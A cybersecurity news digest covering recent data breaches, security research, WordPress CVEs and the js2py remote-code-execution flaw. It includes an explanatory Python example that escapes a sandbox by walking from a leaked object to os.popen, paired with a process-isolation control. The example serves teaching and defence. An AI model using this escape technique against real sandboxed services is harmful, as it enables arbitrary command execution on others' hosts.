Secret CISO 6/19: AMD's Massive Data Breach, Aptihealth's Patient Data Compromise, FTC's Complaint Against TikTok, and Latest Security Research Findings
Welcome to today's issue of Secret CISO, your daily dose of cybersecurity insights. Today we're diving into the world of data breaches and how they're impacting organizations across the globe. First, we'll be discussing the upcoming Super Cyber Friday event "Hacking the Materiality of a Data Breach", and how SEC disclosure rules could shape incident response playbooks. We'll also touch on the shifting public opinion regarding data breaches. In the news, AMD is investigating a potential data breach, with the notorious cybercriminal IntelBroker claiming responsibility; we'll delve into the details of this alleged breach and its potential implications. Meanwhile, nearly 20,000 patients of behavioral health engagement company Aptihealth have been affected by a data breach, highlighting the ongoing vulnerability of healthcare data. In other news, the Association of Texas Professional Educators is investigating a breach discovered in February, and we'll be discussing why data still leaks through enterprise DLP solutions.
We'll also be looking at the recent data breach affecting Maxicare, and the FTC's complaint against TikTok for alleged data privacy practices. Finally, we'll be exploring the latest research in cybersecurity, including the adoption of zero trust, SSE, SASE to enhance network access security, and the latest findings from LevelBlue Labs. Stay tuned for all this and more in today's issue of Secret CISO. Stay safe, stay informed.
Data Breaches
- AMD Investigates Potential Data Breach: AMD, a global computing powerhouse, is investigating a potential data breach after a hacker claimed to have obtained a database from the company and put it up for sale on a dark web forum. The claim was first posted by IntelBroker, a notorious cybercriminal; at the time of writing the breach is alleged, not confirmed by AMD. Source: TechRadar, The Verge
- Aptihealth Patients Affected by Business Associate Data Breach: Nearly 20,000 patients of behavioral health engagement company Aptihealth have been affected by a data breach. The breach was announced by the company, highlighting the ongoing vulnerability of health data. Source: HIPAA Journal
- Association of Texas Professional Educators Data Breach: The Association of Texas Professional Educators (ATPE) identified unusual activity within its computer network on February 12, 2024, and subsequently confirmed a data breach. The ATPE has since secured its network and is working with law enforcement to investigate the incident. Source: Wire19
- Maxicare Data Breach: Maxicare, a health insurance provider, confirmed a data breach that affected less than 1% of its member population. The company was alerted to the potential security incident on June 13 and has since assured members that no medical data was stolen. Source: Manila Standard
- LendingTree Probes Potential Snowflake-Related Data Breach: LendingTree is investigating a potential data breach related to Snowflake, a cloud-based data warehousing platform. The details of the breach, including the number of affected users and the type of data potentially compromised, have not been disclosed. For any Snowflake-hosted dataset, the first questions to ask are whether the account enforced MFA and network policies, since the wave of Snowflake-customer incidents this month has been traced to stolen single-factor customer credentials rather than a compromise of the platform itself. Source: BNN Bloomberg
Security Research
- Kraken Crypto Exchange Extortion Attempt: Kraken, a popular cryptocurrency exchange, faced an extortion attempt from a security researcher who discovered a bug but refused to disclose specifics. The situation highlights the importance of ethical conduct in cybersecurity research. Source: Finbold
- Microsoft Corporate Email Spoofing Bug: A security researcher publicized a flaw that allows threat actors to spoof Microsoft corporate emails, potentially enabling phishing attacks. Microsoft initially dismissed the disclosure. Source: SC Media
- LevelBlue Labs' Evasive Loader Research: LevelBlue Labs, a managed security services provider, released new research on an evasive loader targeting Chinese-speaking victims. The threat actor behind this has not yet been classified as an advanced persistent threat (APT). Source: BusinessWire
- Markopolo's Scam Targeting Crypto Users: Security researcher Manoj Kumar warned about a scam by Markopolo targeting cryptocurrency users through fake meeting software. The scam involves distributing a URL linking to cloud storage via text messages that appear authentic. Source: The Hacker News
- Chrome 126 Update Patches Vulnerability: Google's Chrome 126 update patches a vulnerability that was exploited at a hacking competition. The update also fixes security defects reported by a researcher known as 'wgslfuzz'. Source: SecurityWeek
Top CVEs
- CVE-2023-48759 - Missing Authorization in Crocoblock JetElements For Elementor: The WordPress plugin JetElements For Elementor lacks an authorization check on one of its actions, so a user who can reach the endpoint can trigger functionality that should require a higher capability. Users are advised to update to the latest version. Source: CVE-2023-48759
- CVE-2023-47770 - Missing Authorization in Muffin Group Betheme: The WordPress theme Betheme by Muffin Group has a missing authorization vulnerability. Users are recommended to update to the latest version to mitigate this vulnerability. Source: CVE-2023-47770
- CVE-2023-47771 - Missing Authorization in ThemePunch OHG Essential Grid: The WordPress plugin Essential Grid by ThemePunch OHG is affected by a missing authorization vulnerability. Users are advised to update to the latest version. Source: CVE-2023-47771
- CVE-2023-47681 - Missing Authorization in QuadLayers WooCommerce Checkout Manager: The WordPress plugin WooCommerce Checkout Manager by QuadLayers has a missing authorization vulnerability. Users are recommended to update to the latest version to mitigate this vulnerability. Source: CVE-2023-47681
- CVE-2023-45658 - Missing Authorization in POSIMYTH Nexter: The WordPress theme Nexter by POSIMYTH has a missing authorization vulnerability. Users are advised to update to the latest version. Source: CVE-2023-45658
API Security
- Exploit for CVE-2024-28397 in js2py: A vulnerability has been discovered in the js2py Python package, which is widely used by web scrapers to execute JavaScript. The flaw lies in how js2py implements a global variable, which lets attacker-controlled script obtain a reference to a Python object inside the js2py environment. From any Python object the script can escape the JavaScript environment and execute arbitrary commands on the host. A threat actor can host a website containing a malicious JavaScript file, or submit a malicious script through an HTTP API, for the victim's scraper to evaluate, leading to remote code execution on the host. The practical takeaway is that js2py is an interpreter, not a sandbox: evaluating JavaScript you do not control with it should be treated as running attacker code in your own process. Source: Vulners
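The following is an added illustration, not js2py's code and not the CVE-2024-28397 proof of concept. It shows the generic Python failure mode the advisory describes: once script code holds a reference to any Python object, it can walk the type hierarchy back to the `os` module without importing anything, so "a reference to a Python object" is already remote code execution. The `leaked` argument stands in for whatever object a sandbox accidentally exposes (assumption: an empty dict, an int or a str; any object works). The second function is the control a practitioner would pair with it: running the evaluation in a throwaway process with a stripped environment and a hard timeout. The `reach_os_from`, `escaped_command_output` and `run_isolated` names are this example's own.

```python
# Added example for the js2py item: a leaked Python object is enough to reach
# os, and the only sound control is process isolation. Not js2py's code.
import os
import subprocess
import sys
from typing import List, Optional


def reach_os_from(leaked: object) -> Optional[dict]:
    """Return the `os` module globals starting from an arbitrary object, or None.

    Nothing here imports os; the caller could be script code inside a sandbox
    that was only handed a single harmless-looking object.
    """
    # 1. Any object -> its class -> the root of the class hierarchy, `object`.
    root = type(leaked).__mro__[-1]
    # 2. object.__subclasses__() enumerates every class loaded in the interpreter,
    #    including os._wrap_close, a plain Python class defined in os.py.
    for cls in root.__subclasses__():
        init = getattr(cls, "__init__", None)
        globs = getattr(init, "__globals__", None)  # only Python functions carry this
        if isinstance(globs, dict) and globs.get("__name__") == "os" and "system" in globs:
            return globs  # contains os.system, os.popen, os.environ, ...
    return None


def escaped_command_output(leaked: object, argv: List[str]) -> str:
    """Run a shell command using a function recovered through `leaked` alone."""
    globs = reach_os_from(leaked)
    if globs is None:
        raise RuntimeError("could not reach os from the leaked object")
    # os.popen lives in the same module globals as os.system.
    with globs["popen"](" ".join(argv)) as proc:
        return proc.read().strip()


def run_isolated(untrusted_python: str, timeout_s: float = 5.0):
    """Evaluate untrusted code in a separate interpreter, not in the app's process.

    This bounds blast radius (no access to the parent's memory, secrets or
    environment, and a hard timeout); it does not prevent execution, so real
    deployments still need OS-level confinement such as a container or seccomp.
    `-I` is isolated mode: PYTHON* env vars and the user site directory are ignored.
    Returns (exit_code, stdout).
    """
    # Keep only what the interpreter needs to start; nothing secret is inherited.
    minimal_env = {k: v for k, v in os.environ.items() if k in ("PATH", "SYSTEMROOT")}
    proc = subprocess.run(
        [sys.executable, "-I", "-c", untrusted_python],
        capture_output=True,
        text=True,
        timeout=timeout_s,
        env=minimal_env,
    )
    return proc.returncode, proc.stdout.strip()


if __name__ == "__main__":
    # Constructed demo input: an empty dict is all the "sandbox" leaked.
    print(escaped_command_output({}, ["echo", "escaped"]))
    print(run_isolated("print(6 * 7)"))
```

The point of the first half is that blocking `pyimport` or any particular builtin does not help once an object reference leaks; the second half is why scrapers that must evaluate third-party JavaScript should do so in a disposable worker process rather than inside the service that holds credentials.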
Sponsored by Wallarm API Security Solution
Final Words
As we wrap up today's edition of Secret CISO, we hope you found our insights on data breaches, cybersecurity, and incident response playbooks valuable. The world of cybersecurity is ever-evolving, and it's crucial to stay informed and prepared. Remember, cybersecurity is not just the responsibility of a single department or individual; it's a collective effort. Share this newsletter with your colleagues and friends to help them stay updated on the latest trends and threats in the cybersecurity landscape. And join us on 7-12-24 for Super Cyber Friday's "Hacking the Materiality of a Data Breach".
There we'll delve into how SEC regulations impact incident response playbooks and explore the shifting public opinion on data breaches. Stay safe, stay informed, and let's continue to strengthen our defenses against the ever-present cyber threats.